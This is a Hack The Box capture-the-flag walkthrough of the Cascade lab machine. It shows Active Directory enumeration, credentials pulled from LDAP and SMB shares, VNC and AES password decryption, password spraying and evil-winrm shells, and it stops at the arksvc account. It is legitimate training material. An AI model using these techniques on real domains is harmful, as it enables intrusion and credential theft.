This post is about the Walkthrough of the hackthebox machine: Cascade
Hackthebox Cascade Walkthrough Link to heading
Initial Enumeration Link to heading
Nmap Commands and Scan Results Link to heading
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.182
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.182
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -Pn -sC -sV -oN detailed.txt 10.10.10.182
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -script VULN 10.10.10.182
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.182
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.182
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 20:17 EST
Nmap scan report for 10.10.10.182
Host is up (0.061s latency).
Not shown: 65522 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
49154/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49170/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 34.48 seconds
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 20:17 EST
Nmap scan report for 10.10.10.182
Host is up (0.054s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
53/udp open domain
Nmap done: 1 IP address (1 host up) scanned in 13.70 seconds
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -Pn -sC -sV -oN detailed.txt 10.10.10.182
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -script VULN 10.10.10.182
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 20:21 EST
Nmap scan report for 10.10.10.182
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-17 01:21:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp filtered unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp filtered unknown
49160/tcp filtered unknown
49161/tcp filtered unknown
49162/tcp filtered unknown
49163/tcp filtered unknown
49164/tcp filtered unknown
49165/tcp filtered unknown
49166/tcp filtered unknown
49167/tcp filtered unknown
49168/tcp filtered unknown
49169/tcp filtered unknown
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host is up (0.051s latency).
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
|_sslv2-drown:
445/tcp open microsoft-ds
636/tcp open ldapssl
|_sslv2-drown:
3268/tcp open globalcatLDAP
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49156/tcp filtered unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp filtered unknown
49160/tcp filtered unknown
49161/tcp filtered unknown
49162/tcp filtered unknown
49163/tcp filtered unknown
49164/tcp filtered unknown
49165/tcp filtered unknown
49166/tcp filtered unknown
49167/tcp filtered unknown
49168/tcp filtered unknown
49169/tcp filtered unknown
49170/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 99.93 seconds
At this stage we know it’s something related AD/SMB/DNS. I could also see some domain name like “cascade.local” I am adding this entry intomy /etc/hosts as well. Lets continue more smb enumeration to find more hints
SMB enumeration Link to heading
enum4linux 10.10.10.182
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 16 20:28:40 2022
Users on 10.10.10.182 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc Name: BackupSvc Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman Name: David Burman Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen Name: Joseph Allen Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand Name: John Goodhand Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield Name: James Wakefield Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson Name: Stephanie Hickson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util Name: Util Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
Groups on 10.10.10.182 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472]
I have confirmed the host name as “CASC-DC1.cascade.local” which also i have added in /etc/hosts. Refer below
crackmapexec smb 10.10.10.182
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
┌──(rocky㉿kali)-[~/hckbox/cascade]
└─$ sudo nmap -p 389 --script ldap-rootdse.nse 10.10.10.182
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 22:42 EST
Nmap scan report for cascade.local (10.10.10.182)
Host is up (0.049s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20220217034243.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cascade,DC=local
| dsServiceName: CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local
| namingContexts: DC=cascade,DC=local
| namingContexts: CN=Configuration,DC=cascade,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
| namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
| namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
| defaultNamingContext: DC=cascade,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=cascade,DC=local
| configurationNamingContext: CN=Configuration,DC=cascade,DC=local
| rootDomainNamingContext: DC=cascade,DC=local
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 340251
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: CASC-DC1.cascade.local
| ldapServiceName: cascade.local:casc-dc1$@CASCADE.LOCAL
| serverName: CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 4
| forestFunctionality: 4
|_ domainControllerFunctionality: 4
Service Info: Host: CASC-DC1; OS: Windows 2008 R2
Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
rpcclient -U "" -N 10.10.10.182
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> exit
Lets copy these usernames in text file in valid format which can be used for later part of enumeration.
Using “GetNPUsers.py” to get the hash. However it did not return any valid hash value.
$ GetNPUsers.py -dc-ip 10.10.10.182 cascade.local/ -usersfile users.txt -format john -outputfile cascadehash.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
I have also tried with these usernames without password and same password to see if it allows and it did not work.
smbclient -L \\10.10.10.182\\ -U r.thompson% 1 ⨯
smbclient -L \\10.10.10.182\\ -U util%
smbclient -L \\10.10.10.182\\ -U j.wakefield%
smbclient -L \\10.10.10.182\\ -U s.hickson%
smbclient -L \\10.10.10.182\\ -U j.goodhand%
smbclient -L \\10.10.10.182\\ -U e.crowe%
smbclient -L \\10.10.10.182\\ -U b.hanson%
smbclient -L \\10.10.10.182\\ -U d.burman%
smbclient -L \\10.10.10.182\\ -U BackupSvc%
smbclient -L \\10.10.10.182\\ -U j.allen%
smbclient -L \\10.10.10.182\\ -U i.croft%
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
At this stage , i dont have any hash values or password. Lets try to enumerate more at Active directory level
ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-entry
ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-person
The full result of the ldap query can be found [here](Rchitect/ldap-entry at Yoda · tcprks/Rchitect · GitHub).I have also uploaded the filtered [output](Rchitect/ldap-person at Yoda · tcprks/Rchitect · GitHub) as well.
From these we can see some reference for a username and password
echo clk0bjVldmE= | base64 -d
rY4n5eva
Lets test the access first. Access works with SMB. Not with Winrm
crackmapexec smb 10.10.10.182 -u r.thompson -p 'rY4n5eva'
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
┌──(rocky㉿kali)-[~]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p 'rY4n5eva'
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5eva
This probabaly means we need to find an access for another user who are part of remote access. Lets use the credentails and see if we can login to smbshares.
$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R
[+] IP: 10.10.10.182:445 Name: cascade.local
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 15:00:01 2020 VNC Install.reg
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
.\NETLOGON\*
The above file “VNC install” seems intresting. Full results of above command uploaded [here](Rchitect/smbmap-results at Yoda · tcprks/Rchitect · GitHub).
smbclient \\\\10.10.10.182\\Data -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> cd Temp
smb: \IT\Temp\> cd s.smith\
smb: \IT\Temp\s.smith\> ls
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
6553343 blocks of size 4096. 1623057 blocks available
smb: \IT\Temp\s.smith\> cd VNC Install.reg
cd \IT\Temp\s.smith\VNC\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Temp\s.smith\> get VNC Install.reg
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> get VNC Install.reg
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> mget *
Get file VNC Install.reg? y
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (11.4 KiloBytes/sec) (average 11.4 KiloBytes/sec)
smb: \IT\Temp\s.smith\> exit
I have found a script which run on python to decrypt VNC password. Refer here.
cd vncpasswd.py
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ ls
build-aux d3des Dockerfile.bdist_rpm Makefile pass2reg.cmd setup.cfg VERSION WindowsRegistry
CHANGELOG.md Dockerfile LICENSE MANIFEST.in README.md setup.py vncpasswd.py
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ ./vncpasswd.py -h
usage: vncpasswd.py [-h] [-d] [-e] [-H] [-R] [-o] [-f FILENAME] [-t] [passwd]
Encrypt or Decrypt a VNC password
positional arguments:
passwd A password to encrypt
optional arguments:
-h, --help show this help message and exit
-d, --decrypt Decrypt an obfuscated password.
-e, --encrypt Encrypt a plaintext password. (default mode)
-H, --hex Assume input is in hex.
-R, --registry Input or Output to the windows registry.
-o, --stdout Input or Output only the resulting value to STDOUT.
Always output ciphertext in hexidecimal, and plaintext
in ASCII / UTF-8. A newline is appended to the value.
Useful for scripting.
-f FILENAME, --file FILENAME
Input or Output to a specified file.
-t, --test Run the unit tests for this program.
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
Tesing the access new new credentials
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p 'sT333ve2'
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ evil-winrm -i 10.10.10.182 -P 5985 -u s.smith -p 'sT333ve2'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
The user does not seems like a privilged user. Lets see if he has access to any important files via SMB
smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R
[+] IP: 10.10.10.182:445 Name: cascade.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
.\Audit$\*
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 .
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 ..
fr--r--r-- 13312 Tue Jan 28 16:47:08 2020 CascAudit.exe
fr--r--r-- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 DB
fr--r--r-- 45 Tue Jan 28 18:29:47 2020 RunAudit.bat
fr--r--r-- 363520 Tue Jan 28 15:42:18 2020 System.Data.SQLite.dll
fr--r--r-- 186880 Tue Jan 28 15:42:18 2020 System.Data.SQLite.EF6.dll
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x64
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x86
.\Audit$\DB\*
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 .
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 ..
fr--r--r-- 24576 Tue Jan 28 16:43:18 2020 Audit.db
─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith 1 ⨯
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1623036 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1623036 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (60.5 KiloBytes/sec) (average 60.5 KiloBytes/sec)
smb: \DB\> exit
┌──(rocky㉿kali)-[~/hckbox/cascade]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002
I have not received any useful infor from audit.db
─$ sqlite3 Audit.db 127 ⨯
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;
sqlite>
Lets Download all files under DB folder for further checks
smb: \DB\> cd ..
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1623036 blocks available
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (39.3 KiloBytes/sec) (average 39.3 KiloBytes/sec)
smb: \> get CascCrypto.dll
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (45.3 KiloBytes/sec) (average 41.9 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.2 KiloBytes/sec) (average 29.2 KiloBytes/sec)
smb: \> get System.Data.SQLite.dll
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (733.5 KiloBytes/sec) (average 283.2 KiloBytes/sec)
smb: \> get System.Data.SQLite.EF6.dll
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (640.4 KiloBytes/sec) (average 345.8 KiloBytes/sec)
smb: \> exit
Now lets try to decode this
─$ echo -n BQO5l5Kj9MdErXx6Q6AGOw== | base64 -d | openssl enc -aes-128-cbc -d -nosalt -nopad -K $(echo -n c4scadek3y654321 | iconv -t UTF-8 | xxd -p) -iv $(echo -n 1tdyjCbY1Ix49842 | iconv -t UTF-8 | xxd -p); echo
w3lc0meFr31nd
crackmapexec winrm 10.10.10.182 -u users.txt -p w3lc0meFr31nd --continue-on-success
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\CascGuest:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31nd (Pwn3d!)
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\s.smith:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\util:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.wakefield:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\s.hickson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.goodhand:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\a.turnbull:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\e.crowe:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\b.hanson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\d.burman:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\BackupSvc:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.allen:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\i.croft:w3lc0meFr31nd
username password: arksvc:w3lc0meFr31nd
evil-winrm -i 10.10.10.182 -P 5985 -u arksvc -p 'w3lc0meFr31nd'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
